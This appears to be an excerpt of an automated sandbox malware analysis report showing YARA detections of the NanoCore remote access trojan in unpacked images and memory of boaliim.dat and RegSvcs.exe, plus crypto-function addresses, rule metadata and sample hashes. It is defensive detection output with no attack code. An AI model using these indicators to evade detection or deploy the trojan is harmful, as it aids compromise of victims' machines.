Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000003.511336975.00000000074D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000003.511098071.00000000074D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown

Detected potential crypto function

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095848E	0_2_0095848E
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_00966CDC	0_2_00966CDC
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_00964088	0_2_00964088
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009600B7	0_2_009600B7
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009540FE	0_2_009540FE
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009751C9	0_2_009751C9
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_00967153	0_2_00967153
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009662CA	0_2_009662CA
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009532F7	0_2_009532F7
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009643BF	0_2_009643BF
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095C426	0_2_0095C426
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0097D440	0_2_0097D440
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095F461	0_2_0095F461
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009677EF	0_2_009677EF
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0097D8EE	0_2_0097D8EE
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095286B	0_2_0095286B
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095E9B7	0_2_0095E9B7
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_009819F4	0_2_009819F4
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_00963E0B	0_2_00963E0B
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_00974F9A	0_2_00974F9A
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095EFE2	0_2_0095EFE2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00278037	7_2_00278037
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00272007	7_2_00272007
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0026E0BE	7_2_0026E0BE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0025E1A0	7_2_0025E1A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0025225D	7_2_0025225D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0028A28E	7_2_0028A28E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002722C2	7_2_002722C2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0026C59E	7_2_0026C59E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002DC7A3	7_2_002DC7A3
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0028E89F	7_2_0028E89F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002C291A	7_2_002C291A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00286AFB	7_2_00286AFB
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002B8B27	7_2_002B8B27
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0027CE30	7_2_0027CE30
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00287169	7_2_00287169
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002E51D2	7_2_002E51D2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00259240	7_2_00259240
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00259499	7_2_00259499
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00271724	7_2_00271724
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00271A96	7_2_00271A96
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00259B60	7_2_00259B60
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00277BAB	7_2_00277BAB
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00271D40	7_2_00271D40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00277DDA	7_2_00277DDA

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

7_2_002B1A91

Tries to load missing DLLs

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Section loaded: dxgidebug.dll	Jump to behavior

Uses 32bit PE files

Source: P05jmXYKpr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
